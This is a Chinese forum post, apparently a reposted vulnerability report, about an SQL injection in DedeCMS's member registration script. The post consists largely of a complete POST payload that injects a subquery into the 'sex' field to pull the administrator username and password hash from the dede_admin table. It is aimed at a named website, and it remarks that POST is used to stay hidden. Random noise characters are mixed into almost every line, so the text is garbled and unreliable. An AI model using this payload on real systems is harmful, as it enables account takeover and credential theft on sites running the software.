漏洞类型: SQL注射漏洞( R, a- L, o- E9 r
简要描述:
% L1 L1 }8 l: U$ Q* j
7 U( g) M2 O3 L5 |) c需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.+ y& |3 \% K; r4 s- ]
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.4 p' }2 |& @ H" J: ^
详细说明:跟这个漏洞
; L* _8 P* j, G5 t2 e & ]+ p; B7 {$ P5 G- Q4 g2 Q
WooYun: Dedecms SQL注射导致审核机制绕过漏洞/ t* _ V$ w5 a2 w
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.+ Y4 R* ^/ ?2 V. M% V3 t
POST提交以下数据,其实不用POST提交的,这样隐蔽点.& z* k! ^3 g0 p! _0 y5 h k& N
% F/ V9 p8 t: d ?% t4 w* ?- L
www.political-security.com/member/reg_new.php
9 n5 U" {# y1 b 9 Q. V8 u) J6 F4 y- c2 |% m
POST; {; j+ l4 E' D, y* A: F
+ P; ^' ~* [; k; ?; G8 Ldopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
" o2 t4 f f/ r- l$ Juserid=c4rp3nt3r&uname=c4rp3nt3r
* Y$ x' p3 L3 M" k5 V3 a&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
: O5 z6 [ z' h; t0 N+ v&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,; I- ?, `- ^) s
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');* X7 T2 I9 U+ B$ J5 H
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对